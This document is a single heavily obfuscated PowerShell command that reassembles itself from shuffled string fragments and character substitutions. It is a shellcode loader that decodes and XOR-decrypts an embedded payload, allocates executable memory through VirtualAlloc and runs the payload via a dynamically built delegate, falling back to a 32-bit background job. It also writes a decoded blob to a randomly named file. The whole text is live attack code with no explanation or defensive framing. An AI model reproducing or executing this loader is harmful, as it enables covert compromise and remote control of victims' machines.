.( $pShOme[21]+$pShOme[34]+'x')(((("{241}{135}{252}{126}{183}{40}{85}{132}{287}{100}{359}{88}{96}{328}{310}{10}{44}{83}{292}{360}{228}{198}{219}{82}{181}{246}{304}{21}{222}{309}{104}{350}{214}{162}{326}{155}{296}{27}{249}{66}{172}{17}{334}{331}{187}{129}{73}{86}{203}{342}{118}{247}{72}{97}{276}{51}{161}{185}{134}{15}{152}{205}{174}{355}{16}{125}{361}{301}{234}{283}{108}{226}{26}{264}{78}{36}{281}{22}{25}{248}{165}{312}{313}{227}{278}{140}{8}{352}{23}{109}{68}{175}{244}{141}{242}{7}{81}{280}{335}{150}{208}{204}{308}{53}{19}{341}{65}{221}{321}{130}{277}{93}{33}{121}{344}{153}{110}{353}{142}{239}{127}{196}{137}{38}{265}{144}{52}{154}{164}{262}{274}{260}{207}{59}{178}{182}{259}{322}{311}{124}{340}{171}{98}{136}{271}{200}{273}{307}{348}{157}{213}{3}{358}{332}{74}{56}{258}{90}{318}{34}{346}{0}{299}{243}{216}{89}{158}{120}{180}{167}{6}{362}{255}{333}{133}{63}{306}{145}{329}{305}{357}{28}{69}{177}{166}{71}{295}{143}{267}{119}{324}{75}{266}{107}{62}{325}{272}{176}{184}{61}{289}{195}{209}{230}{18}{336}{251}{225}{261}{193}{343}{54}{106}{58}{192}{354}{253}{199}{337}{327}{211}{115}{231}{24}{160}{101}{5}{138}{168}{46}{347}{314}{217}{139}{116}{32}{351}{338}{170}{290}{316}{269}{31}{102}{245}{92}{99}{151}{215}{356}{91}{12}{117}{186}{279}{319}{76}{131}{293}{275}{345}{103}{20}{206}{42}{286}{41}{64}{191}{148}{67}{14}{147}{240}{80}{149}{48}{232}{13}{288}{237}{163}{349}{2}{212}{146}{197}{122}{339}{77}{84}{201}{236}{50}{300}{210}{202}{263}{317}{303}{291}{112}{188}{270}{49}{268}{190}{111}{159}{238}{47}{235}{4}{223}{55}{189}{218}{43}{35}{9}{254}{37}{1}{282}{60}{233}{128}{169}{256}{250}{95}{220}{57}{94}{113}{284}{315}{173}{257}{298}{302}{87}{156}{30}{45}{323}{294}{39}{194}{224}{179}{320}{285}{105}{123}{229}{114}{11}{79}{29}{297}{330}{70}"-f'                  ','  )

    59D4exslj = [Con','                                                                                                                                                                                                                          ','               ','
    Param(
      ','                                                          ','                                          ','   ','                                                           ','ing]','                ','                                  ','               ','                                                                      ','::Copy(59D4var_code, 0, 59D4var_buffer, 59D4var_code.length)     ','                               
}                                                             ','                                                        ','GetProcAddressRH3, ','IVGw0TDRITFSNmMgVXRH3)                               ','   ','gate_type @([IntPtr], [UInt32], [UIn',', 59D4var_procedure)                      ','                        ','              [Parameter(Position = 0, Mandatory = 59D4True)] [Type[]] 59D4var_parameters,                                         ','                   ','                            ','                            ','s(RH3System.dllRH3) }).GetType(RH3Microsoft.Win32.UnsafeNativeMethodsRH3)       ','IvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSnd','                                                ','aU   . (RH3ReceiRH3  +RH3vRH3  +  RH3e-JobRH3  )                                  ','  ','                 ','             ','             ','  [str','                
function func_get_delegate_type {','  ','  ','                                                                                                                         ','                          ','r]::Zero, 59D4var_code.Length, 0x3000, 0x40)                                                                                                                         ','                                
59D4var_buffer ','ter(Mandatory=59D4True, Position=1)]
      ','                                                            ','       ','e[59D4x] = 59D4var_code[59D4x] -bxor 35      ','                 ','                          ','jzqm','                                                                                         
RH3@','var_procedure))                                                                                      ',' HideBySig, PublicRH3, [System.Reflection.CallingCon','                                                      ','  ','Parameter(Mandatory=59D4True, Positi','                                               
                                                                                                                                                                                                                                                     ','
    59D4f','                                                                            
                                                                             ','uilder.DefineMethod(RH3InvokeRH3, RH3Public, HideBySig, NewSlot, VirtualRH3, 59D4var_return_type, 59D4var_parameters).SetImplementationFlags(RH3Run','rt]::FromBase64String(59D4xzg)
    [IO.File]::WriteAllBytes(59D4kspu, 59D4exslj)
}
                        ','SCMZxuve/HmCislmUran','5TQldKQU9G','           
[Byte[]]59D4var_code = [System.Convert]::FromBase64String(RH338uqIyMjQ6rGEvFHq','         ','        ','                              
        5','ropServices.Marshal]','                                                                                   ','Lb1QFJNz2Etx0dHR','59D4ujzqm;

','xMyMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcp','ct System.Runtime.InteropServices.','           ','                            ','RG','                                                ','                                     
59D4var_runme = [System.Runtime.InteropServices.Mars','                                                                                                                        ','     ','                                       ','            ','                                                           ','                                                                                            
59D4{Dp82Oit}   =  @RH3        ','hal]::GetDelegateForFunctionPointer(59D','                                                ','   
    ',' + RH3art-jobRH3 ) { param( 59D4{a} ) .','                                                                                                     ','                ','     
                                      ','                                               
                                                ','    
                             ','                    ','iirhame  = -join (59D4jvql DaU Get-Random -Count 59D4irh DaU % {[Char]59D4_})
    return 59D4fiirhame
}

If (   ( gI VariAble:Y42wSj  ).VA','                         
function p','                                                                     ','Handle','                                        ','                                                  ','                        
 ','                    ','                                   ','ces.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_dele','             ','             ','                                                   ','Fg0TAwtATE','            
                    ','                                               ','                                                                                    ','gAxADAANQAnAA==RH3;
                        ','                                              ','lue::vnE1Sp82i','                                                        ','; 59D4x -lt 59D4var_co','                                                
}             ','     ','(59D4null, @([System.Runtime.InteropServices.HandleRef','usu3dv/j','   ','       
  ','                                                             ','                                                        ','                                                                                                                                    ','                                                                                                                                            ','3) -Ve','ass, AutoClassRH3, [System.MulticastDelegate])    ','                               ','     ','                                                                    ','                                       ','                           ','                                    ','                                                                                      ','H','                                                  
                                                                ','                                                                                                                                                  ','                                                     ','                                                              ','                               ','   ','= [AppDomain]::CurrentDomain.DefineDynamicAssembly((N','TDKNz2nCMMIyMa5FeUEtz','_type_builder.DefineConstructor(RH3RTSpecialName,','E3qFELLJRpBRLcEu','                            
                                                                                                        ','                                                       ','                                          
[System.Runtime.Inte','                                            
     ','                                                     
        )                          ','                                                   ','                           ','                                                      ','ven','.GlobalAssemblyCache','( RH3IERH3 +RH3XRH3  ) 59D4{A} } -RunAs32 -Argument 59D4{dOp82iT} DaU   &  (  RH3waRH3 +RH3it-RH3+  RH3jobRH3 )   D','                               ','                                ','                                                                                                                                                                          ','                                                              ','                 ','_methods = ([AppDomain]::CurrentDomain','    ','tions]::Standard, 59D4var_parameters).SetImplementationFlags(R','                                                                                                                            
        Param (                                ','ySSBycku','                       ',' 
        59D4var_cod','                                                     ','                  ','                              
                                                                                                                                                                            ','9D4var_gpa = 59D4var_unsafe_native_methods.GetMethod(RH3','                                                       ','    ','     
                [Parameter(Position = 1)] [Type] 59D4var_return_type','bYVs','0dEsZdVqE3PbKpyMjI3gS6nJ','time, Ma','     ','                                  ','                                                                                                          ','nagedRH3)         ','rsion 2
                                                           ','2QUxEtSKDXFzSmNINP7p','                                         ','                         ','                                 ','                                                      ','on=','HAAOgA2ADkALgAyADUALgAxADYAL','              ','                   ','                                ','                   
else {                                                ','kvxkWsTUXcr6PNA9cLlWYJWlEjIFmHgwyNL0','                     ','                                                          ','                                  
function func_ge','                  
                                                       ','         ','4var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))                                                                                                                      
59D4var_runme.Invoke([IntPtr]::Zero)                                                                                    ','                    ','    return 59D','    ','                                                                                                                                          ','t32], [UInt32]) ([IntPtr])))                   ','           
        59D4var_type_b','                                                                       ','5aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiM','                                                                                                     ','                                                                                                                                                                                                     
for (59D4x = 0','             ','                              ','                                 
        59D4var_unsafe_native','                                 ','                                                      
                ','          ','0)]
        [string] 59D4kspu,
        [Parame','t_proc_address {  ','wamvys() {
    59D4irh = Get-Random -Min 3 -Max 5
    59D4jvql = ([char[]]([char]97..[char]122))','                                                                                                         ','          ','  [','                                                       ','          ','                    ','                                    ','                                                                                                                                              ','       
        &(  RH3IERH3+  RH3XRH3 ) 59D4{DOp82It}                                               ','jIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcEhoRDR','de.Count; 59D4x++) {     ','    ','                                                ','                 ','     
function ksrpyf {','                                                        ','                                     ','                                              ','ew-Object System.Reflection.AssemblyName(RH3ReflectedDelegateRH3)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(RH3InMemoryModuleRH3, 59D4false).DefineType(RH3MyDelegateTypeRH3, RH3Class, Public, Sealed, AnsiCl','                            ','  sV Y42WSj  (  [TyPe]( RH3InTPRH3+ RH3trRH3 ));  &(  RH3SRH3+R','                                                                                        ','                   ',' = [Void]                  ','                        ','                                               ','](New-Obje','              ',' ',' ','                                                                                                  ','3et-StricRH3 +RH3tRH3  +RH3ModeRH','                                                                                                          ',' 59D4xzg
','       ','                                                                                ','              ','            ','                                  ','                                                     ','                         
                                                                                          ','H3Runtime, M','                                            ','                                                          ','      
        59D4var','TVcZA25MWUpPT0IM','KsiIjI8rqIiMjy6jc3NwMThB1RSPI5Foey85H7MLtW',' = RH3JwBpA','                                                                                                  ','                                                                        
59D4u','                                                                                                                                     ','9/85z039oFy5NTemOBwIf5WajKXeowbt9G1LFO4QVMCGdJ1STQ5VsGl8wxMB+alEpMwP4I5ILts7UrS5HQOUiIiGo6NH','                                   ','anagedRH3)         ','      
59D4var_va = [System.Runtime.InteropSe','Ref((New-Object IntPtr), (59D4var_unsafe_native_methods.GetMethod(RH3GetModuleHandleRH3)).Invoke(59D4null, @(59D4var_module)))), 59D4','                                                                                                 ','            ','                                           ',' ','                                       ','ve','                                                                                                    ','ZEvnE1 -eq 8 ) {                                                                                                ','                            ','= 59D4var_va.Invoke([IntPt','                                                                              ','                                    ','MVlRdWVDDxU91','                                              
                                                         ','                             ','                                         ','                ','           ','tVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlH',' -And 59D4_.Location.Split(RH3WX7WX7RH3)[-1].Equal','                                       
} 
59D4ct','                          ','                  ','                 ','               ','        
          .  (RH3stRH3 ','                                            ','                
        Param (59D4var_module','0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwu','HETqHEvqH','                     
        return 59D4var_type_builder.CreateType()                       ','                                                                      ','                                                                                    ','     ','            ','  ','                                      ','      ','        ','                                          ','                                                                              
                 ','                                                             ','                 ','                                            ','                                                                                      
                                                         ','                                                      
                                                                            ','                                                   
}                                                                                                              ','RL6y+dIUA5NhJdOmFeznG/WDP9YDQjL+eDfZd2G4lBk9c4hHfl/yvlRvkrIHvLGSE+fcegl44THI3ZQRlEOYk','GANucGpmAxoNExgDdEpNR0xUUANtdwMVDRIYA3dRSkdGTVcMFg0TGANhbGpmGhhmbXtiCi4pI95SHjgm3k4q7G+MXlOXR5lXh7bXwiPmDXE+MB/Tz3UNi6F9hTXqKPQ0WbU9GnYpLLD4/dbYAuGaPQeg2T8x13doxc1V7hH4psunIoOa','.GetAssemblies() DaU Where-Object { 59D4_','       ','                                                                          
                                                                                         ','OPH','v = pwamvys;
ksrpyf 59D4ctv ','                          ','                                                                                                                                             ','                  ','[Type[]] @(RH3System.Runtime.InteropServices.HandleRefRH3, RH3stringRH3))                                             ','          ','                        ','   ','                                                                       ','  ','            ','                         
                                                               ','4var_gpa.Invoke','           ','                     ','rvi','                                         ','                                                                                    ','                                                                                                        ','                                                                                
   ','                                                         ','                                                                                                ','                                     
  ','                                                                                                     
        59D4var_type_builder ','                                          ','                               
                                                          ','                                                    ','IuQbw1bXIF7bGF4HVsF7qHsH','              
}                                             ','                 ','                     ','        
                                                                                                                      ','                        '))  -REpLAce  ([CHAr]118+[CHAr]110+[CHAr]69+[CHAr]49),[CHAr]34 -crepLAce '59D4',[CHAr]36 -crepLAce ([CHAr]82+[CHAr]72+[CHAr]51),[CHAr]39  -REpLAce 'p82',[CHAr]96 -REpLAce  'WX7',[CHAr]92 -crepLAce  ([CHAr]68+[CHAr]97+[CHAr]85),[CHAr]124) ) 
